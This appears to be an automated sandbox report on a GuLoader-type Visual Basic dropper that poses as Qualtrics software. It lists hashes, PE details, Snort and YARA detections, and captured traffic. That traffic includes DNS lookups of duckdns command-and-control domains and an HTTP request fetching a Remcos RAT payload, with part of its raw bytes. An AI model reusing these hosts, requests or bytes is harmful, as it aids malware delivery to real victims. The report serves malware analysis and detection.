              • 23.146.242.94
              Payment Notification.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Request For Quotation.jarGet hashmaliciousBrowse
              • 23.146.242.147
              OvBS76pTyX.exeGet hashmaliciousBrowse
              • 23.146.242.94
              U6lqJJBG8S.exeGet hashmaliciousBrowse
              • 23.146.242.94
              pNyAinWdWJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              YTVrQC7FhG.exeGet hashmaliciousBrowse
              • 23.146.242.94
              I4eRfFgJG7.exeGet hashmaliciousBrowse
              • 23.146.242.94
              sLVCW67F5w.exeGet hashmaliciousBrowse
              • 23.146.242.94
              http___s-rco.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.94

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.210722948101354
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:466XoziOLD.exe
              File size:196608
              MD5:84ade48e59ed36c620d254d325f355d7
              SHA1:6e17eb18c64e00ca9831e940769da9c744a5d5e3
              SHA256:8060a88a8253eafc4c38d56d58d8470b98765308aeafc1e873b95011cbb8cadf
              SHA512:8d4b4ae4c49d9f7f9bf8456d727a78cbd0cc0c2fc969b094bc653ec6d85d2d583337f0acb5b7f5c2fea97f6769f2981b28230d821818c9767cfacf810713ad6b
              SSDEEP:3072:RE8XO9B0GS31gah3MwJvwouDIQVcc+84+Z8j7G9YgVodURItu5:FO9B0GS317h3Mw2ouMWcc+86jq9Rodu
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......S.....................0....................@................

              File Icon

              Icon Hash:20047c7c70f0e004

              Static PE Info

              General

              Entrypoint:0x4013f0
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x538C1A17 [Mon Jun 2 06:30:47 2014 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:bd85017eeb8dd3332d04b1838f2b93b1

              Entrypoint Preview

              Instruction
              push 004016A4h
              call 00007F96F8F76CB3h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], ch
              cmp al, 4Dh
              into
              cmc
              pushfd
              push esp
              dec edi
              movsb
              mov cl, EEh
              call far 0000h : 45CE1C92h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add dword ptr [eax], eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              push ebp
              dec esi
              push esp
              dec ecx
              dec ebp
              inc ebp
              dec esp
              dec ecx
              dec esi
              inc ebp
              push ebx
              push ebx
              add byte ptr [edi], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              dec esp
              xor dword ptr [eax], eax
              or al, ACh
              jc 00007F96F8F76CC3h
              sub esp, dword ptr [edx-4Ah]
              push ds
              inc edx
              mov ebx, 4511F505h
              das
              cmp dl, byte ptr [ebx-13h]
              popfd

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x2d0b40x28.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000xbfa.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x138.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x2c5680x2d000False0.621511501736data7.42071533983IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .data0x2e0000x190c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc0x300000xbfa0x1000False0.253173828125data3.1781767801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              CUSTOM0x309a00x25aASCII text, with CRLF line terminatorsEnglishUnited States
              RT_ICON0x308700x130data
              RT_ICON0x305880x2e8data
              RT_ICON0x304600x128GLS_BINARY_LSB_FIRST
              RT_GROUP_ICON0x304300x30data
              RT_VERSION0x301a00x290MS Windows COFF PA-RISC object fileEnglishUnited States

              Imports

              DLLImport
              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

              Version Infos

              DescriptionData
              Translation0x0409 0x04b0
              InternalNameskraalinjers
              FileVersion1.04
              CompanyNameQualtrics
              CommentsQualtrics
              ProductNameQualtrics
              ProductVersion1.04
              FileDescriptionQualtrics
              OriginalFilenameskraalinjers.exe

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              09/27/21-10:59:46.401028UDP254DNS SPOOF query response with TTL of 1 min. and no authority53617218.8.8.8192.168.2.4
              09/27/21-10:59:47.542847UDP254DNS SPOOF query response with TTL of 1 min. and no authority53512558.8.8.8192.168.2.4
              09/27/21-10:59:47.658245TCP2032776ET TROJAN Remocs 3.x Unencrypted Checkin498292404192.168.2.423.146.242.71
              09/27/21-10:59:47.957165TCP2032777ET TROJAN Remocs 3.x Unencrypted Server Response24044982923.146.242.71192.168.2.4

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2021 10:59:46.415395975 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.528383017 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.528517008 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.529064894 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.644090891 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.644130945 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.644157887 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.644182920 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.644210100 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.644212961 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.644251108 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756012917 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756086111 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756130934 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756149054 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756181955 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756194115 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756213903 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756273031 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756279945 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756337881 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756341934 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756398916 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756402969 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756458044 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.756465912 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756521940 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.756561995 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.868513107 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.868560076 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.868592024 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.868626118 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.868654013 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.868680954 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.868727922 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.868850946 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.868881941 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.868906021 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.868916035 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.868936062 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869277954 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869307995 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869333029 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869359016 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869386911 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869388103 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869420052 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869421005 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869452000 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869466066 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869482994 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869496107 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869514942 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869532108 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869556904 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869621992 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.869669914 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.869820118 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980645895 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980704069 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980753899 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980760098 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980784893 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980792999 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980804920 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980833054 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980840921 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980868101 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980871916 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980911970 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980912924 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980946064 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.980948925 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980982065 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.980983973 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981017113 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981018066 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981046915 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981070995 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981079102 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981111050 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981125116 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981134892 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981146097 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981223106 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981270075 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981298923 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981331110 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981340885 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981359959 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981370926 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981388092 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981401920 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981417894 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981425047 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981446981 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981453896 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981482983 CEST4982880192.168.2.423.146.242.85
              Sep 27, 2021 10:59:46.981522083 CEST804982823.146.242.85192.168.2.4
              Sep 27, 2021 10:59:46.981551886 CEST804982823.146.242.85192.168.2.4

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2021 10:55:43.547386885 CEST4925753192.168.2.48.8.8.8
              Sep 27, 2021 10:55:43.568686008 CEST53492578.8.8.8192.168.2.4
              Sep 27, 2021 10:56:16.208640099 CEST6238953192.168.2.48.8.8.8
              Sep 27, 2021 10:56:16.238595009 CEST53623898.8.8.8192.168.2.4
              Sep 27, 2021 10:56:52.018357038 CEST4991053192.168.2.48.8.8.8
              Sep 27, 2021 10:56:52.036250114 CEST53499108.8.8.8192.168.2.4
              Sep 27, 2021 10:56:53.979378939 CEST5585453192.168.2.48.8.8.8
              Sep 27, 2021 10:56:53.999665022 CEST53558548.8.8.8192.168.2.4
              Sep 27, 2021 10:56:56.096577883 CEST6454953192.168.2.48.8.8.8
              Sep 27, 2021 10:56:56.170964003 CEST53645498.8.8.8192.168.2.4
              Sep 27, 2021 10:56:56.789237022 CEST6315353192.168.2.48.8.8.8
              Sep 27, 2021 10:56:56.805994034 CEST53631538.8.8.8192.168.2.4
              Sep 27, 2021 10:56:57.569608927 CEST5299153192.168.2.48.8.8.8
              Sep 27, 2021 10:56:57.628201008 CEST53529918.8.8.8192.168.2.4
              Sep 27, 2021 10:56:59.870285034 CEST5370053192.168.2.48.8.8.8
              Sep 27, 2021 10:56:59.884049892 CEST53537008.8.8.8192.168.2.4
              Sep 27, 2021 10:57:00.406658888 CEST5172653192.168.2.48.8.8.8
              Sep 27, 2021 10:57:00.471741915 CEST53517268.8.8.8192.168.2.4
              Sep 27, 2021 10:57:01.776452065 CEST5679453192.168.2.48.8.8.8
              Sep 27, 2021 10:57:01.884234905 CEST53567948.8.8.8192.168.2.4
              Sep 27, 2021 10:57:03.995960951 CEST5653453192.168.2.48.8.8.8
              Sep 27, 2021 10:57:04.020252943 CEST53565348.8.8.8192.168.2.4
              Sep 27, 2021 10:57:05.849982023 CEST5662753192.168.2.48.8.8.8
              Sep 27, 2021 10:57:05.863204956 CEST53566278.8.8.8192.168.2.4
              Sep 27, 2021 10:57:06.645034075 CEST5662153192.168.2.48.8.8.8
              Sep 27, 2021 10:57:06.659590006 CEST53566218.8.8.8192.168.2.4
              Sep 27, 2021 10:57:07.133625031 CEST6311653192.168.2.48.8.8.8
              Sep 27, 2021 10:57:07.147277117 CEST53631168.8.8.8192.168.2.4
              Sep 27, 2021 10:57:46.642829895 CEST6407853192.168.2.48.8.8.8
              Sep 27, 2021 10:57:46.655601978 CEST53640788.8.8.8192.168.2.4
              Sep 27, 2021 10:57:49.210418940 CEST6480153192.168.2.48.8.8.8
              Sep 27, 2021 10:57:49.248955965 CEST53648018.8.8.8192.168.2.4
              Sep 27, 2021 10:59:46.285010099 CEST6172153192.168.2.48.8.8.8
              Sep 27, 2021 10:59:46.401027918 CEST53617218.8.8.8192.168.2.4
              Sep 27, 2021 10:59:47.428427935 CEST5125553192.168.2.48.8.8.8
              Sep 27, 2021 10:59:47.542846918 CEST53512558.8.8.8192.168.2.4

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Sep 27, 2021 10:59:46.285010099 CEST192.168.2.48.8.8.80xfa1fStandard query (0)sopage.duckdns.orgA (IP address)IN (0x0001)
              Sep 27, 2021 10:59:47.428427935 CEST192.168.2.48.8.8.80x266dStandard query (0)solex-wave.duckdns.orgA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Sep 27, 2021 10:59:46.401027918 CEST8.8.8.8192.168.2.40xfa1fNo error (0)sopage.duckdns.org23.146.242.85A (IP address)IN (0x0001)
              Sep 27, 2021 10:59:47.542846918 CEST8.8.8.8192.168.2.40x266dNo error (0)solex-wave.duckdns.org23.146.242.71A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • sopage.duckdns.org

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.44982823.146.242.8580C:\Users\user\Desktop\466XoziOLD.exe
              TimestampkBytes transferredDirectionData
              Sep 27, 2021 10:59:46.529064894 CEST9718OUTGET /Remcos_s_bChlcwVW46.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: sopage.duckdns.org
              Cache-Control: no-cache
              Sep 27, 2021 10:59:46.644090891 CEST9720INHTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Last-Modified: Sun, 26 Sep 2021 08:50:35 GMT
              Accept-Ranges: bytes
              ETag: "694a3892b3b2d71:0"
              Server: Microsoft-IIS/8.5
              Date: Mon, 27 Sep 2021 08:59:38 GMT
              Content-Length: 469056
              Data Raw: e7 da 56 c8 54 c9 89 52 51 a6 5c 88 94 c5 ea f4 9c 2e 9a 90 3d e6 03 a9 bf b7 5d b0 c5 1a 2a 8b 40 14 e9 68 e5 98 9f 59 f8 c2 5e 89 9f e7 c3 3a 26 8c e3 f4 bb 03 ff 27 ec 82 4a c5 d1 21 ce fa a5 74 ce 44 bd 76 77 6d 5c 9e bc 42 e6 c0 d4 38 c5 bf 78 4b 0c a3 39 1d 14 84 20 a3 8f 73 f7 a1 ac a5 93 1f ad c1 6f 93 15 af a4 17 d5 19 eb 90 6c 7e 36 0e 32 0c 12 c9 cb 0a 03 eb 4e 18 f4 0d 1b ec 5c 48 67 e3 2b e7 cf af 67 1a 0b 1b e3 c6 c4 8f f3 3d f1 f4 b6 4e 4e 26 15 2d 8a f7 b9 b9 22 24 55 31 3b 56 8d 9c b9 41 55 2c b0 b9 98 37 d2 f1 cc 9b 87 07 02 38 eb 68 b6 0c 1a 1b 12 45 4d 36 c9 6e 49 7f 94 0c c8 bb 69 e2 f9 28 09 e9 9c 36 c3 b0 e6 2b df 74 04 7a 67 0a 09 55 b9 bd 02 38 17 8a 3b d6 37 de d7 c6 3d 43 ae 3d 95 8e 32 26 23 a9 16 3f ab 93 70 78 dd 15 5b c3 97 e2 3b 34 a0 03 b8 1a be 74 de fd cb 4c f0 6a d4 ba 03 bb 35 43 51 fa 6c 20 18 c3 13 6f 52 3f db d7 7b 4c 69 98 c1 82 83 13 22 29 10 86 90 ad b4 9d 0a 52 d3 bb 1b 45 df a5 fd 29 ad 5e 6c fe fa 38 48 c1 ab 3f 4e 27 d5 f6 a7 ba 87 2d 73 2e d3 be ae 8a 2e 33 db af 9e 83 38 47 a3 a1 0a 53 09 3c cc d1 c0 e9 e6 d3 1e f5 c3 40 9c cf ac 32 a6 ef 00 17 75 0b 00 39 32 78 ed b5 32 17 fc 70 2c 89 ba 1c c8 25 36 cb f9 9f 83 bd 20 53 75 10 cd a3 d9 b2 ab 92 29 ce 65 31 2d 62 d5 4b 53 4a 4b 29 4c 98 4f 25 0a c9 a3 89 c1 b2 e3 e8 74 92 9b 51 f9 02 fc 94 4d dc dc 0f 5e 74 52 c9 4b 18 7d 48 e7 df 86 df e8 cc 66 2a 75 f2 a8 3f 10 88 2e 23 64 bd 12 d6 a2 c3 de 80 35 7b 79 89 27 b1 1f 50 38 09 2a 89 4f 81 8b 6e a4 37 62 1a 9d 13 49 f3 df c3 35 42 96 24 9b 7f c7 42 3d f8 6a f1 cd c0 91 c5 94 1d a4 09 af 34 c3 94 51 a7 48 14 59 33 54 30 60 33 78 55 f3 2c 0a ff 4a 23 d9 92 90 2e e5 d3 d5 87 6f ee cc ae 52 b4 b6 9c a3 9e a3 62 75 42 62 2d e1 48 84 fc 62 c8 87 b4 22 d1 e0 ca d0 03 2c aa 97 fb d8 71 8e 24 98 36 ac 1c 93 c3 2d 74 2c 50 74 5b cc 6d ab c9 9d b7 46 91 0d 24 94 76 6b 94 77 19 92 82 c8 b0 cf c8 a2 50 68 7f d8 77 d4 7c e4 28 f2 1e 98 2d 7b b3 a1 41 de 1d fe 59 91 3c e0 ce de 77 bd fc de ab f2 17 43 18 4b 50 31 e8 65 14 2f 6a 50 ed 4d a9 bf c1 7e a2 76 21 68 b2 c9 34 a0 e7 dd f5 7a e9 64 33 7d c9 34 26 f8 e3 f7 b0 ad b0 af 35 6d 18 30 24 59 4b cf d0 ec de 80 d3 b2 2d 36 49 53 dc 1b a7 e2 0c d3 5d 05 80 c5 04 cc 56 8a a2 62 10 f3 dd 7c 14 6e 7a 9b 22 2e ab 94 6e 2f fd bd a4 1e 69 bc 6f 75 8a c3 30 13 1f cf 8e a7 c4 b6 6e a6 e6 94 b4 bf fd 8e d2 36 c9 a3 74 e5 00 19 22 00 9a e3 f5 2b 43 31 b6 76 5b cb cf b8 06 bc 92 d2 a0 2f 13 a7 60 9c a2 6a a9 fb f9 44 57 1d b3 05 99 5e ad 39 7c b1 36 e9 e3 fb 77 a3 09 4f e7 42 2a 2e 42 a0 e5 80 4e c9 83 88 18 2e da 4f c4 70 51 2e 50 25 77 cf b3 30 fc d4 5d d5 93 1b 1c 36 bb 05 b0 89 6c 53 a6 63 76 82 49 c0 00 02 5e 88 5c 5a bc f8 d9 ee f1 a2 2a a1 60 b3 18 70 fc e1 72 dc d2 53 6e db f9 f4 56 a7 14 88 24 a9 ab f0 0f a9 6c 39 e0 eb 86 5e 8c 5f 4c 00 f8 ee 69 7f 64 c1 13 a4 db 3b 19 a0 94 c7 ba 72 01 fb 1b 5d 79 46 e8 2e 5e 44 be 76 77 6d 58 9e bc 42 19 3f d4 38 7d bf 78 4b 0c a3 39 1d 54 84 20 a3 8f 73 f7 a1 ac a5 93 1f ad c1 6f 93 15 af a4 17 d5 19 eb 90 6c 7e 36 0e 32 0c 12 c9 cb 0a 03 eb 5e 19 f4 0d 15 f3 e6 46 67 57 22 2a ee 17 66 56 c6 3a b7 ae ad fc d3 4d 83 9b d1 3c 2f 4b 35 4e eb 99 d7 d6 56 04 37 54 1b 24 f8 f2 99 28 3b 0c f4 f6 cb 17 bf 9e a8 fe a9 0a 0f 32 cf 68 b6 0c 1a 1b 12 45 e7 b5 8b 5e a7 9d b8 6f 26 59 45 81 17 ca 25 8a c6 f1 fe 13 5c c9 1b 74 51
              Data Ascii: VTRQ\.=]*@hY^:&'J!tDvwm\B8xK9 sol~62N\Hg+g=NN&-"$U1;VAU,78hEM6nIi(6+tzgU8;7=C=2&#?px[;4tLj5CQl oR?{Li")RE)^l8H?N'-s..38GS<@2u92x2p,%6 Su)e1-bKSJK)LO%tQM^tRK}Hf*u?.#d5{y'P8*On7bI5B$B=j4QHY3T0`3xU,J#.oRbuBb-Hb",q$6-t,Pt[mF$vkwPhw|(-{AY<wCKP1e/jPM~v!h4zd3}4&5m0$YK-6IS]Vb|nz".n/iou0n6t"+C1v[/`jDW^9|6wOB*.BN.OpQ.P%w0]6lScvI^\Z*`prSnV$l9^_Lid;r]yF.^DvwmXB?8}xK9T sol~62^FgW"*fV:M</K5NV7T$(;2hE^o&YE%\tQ


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:10:55:48
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\466XoziOLD.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\466XoziOLD.exe'
              Imagebase:0x400000
              File size:196608 bytes
              MD5 hash:84ADE48E59ED36C620D254D325F355D7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:low

              General

              Start time:10:57:52
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\466XoziOLD.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\466XoziOLD.exe'
              Imagebase:0x400000
              File size:196608 bytes
              MD5 hash:84ADE48E59ED36C620D254D325F355D7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, Author: Joe Security
              Reputation:low

              Disassembly

              Code Analysis

              Reset < >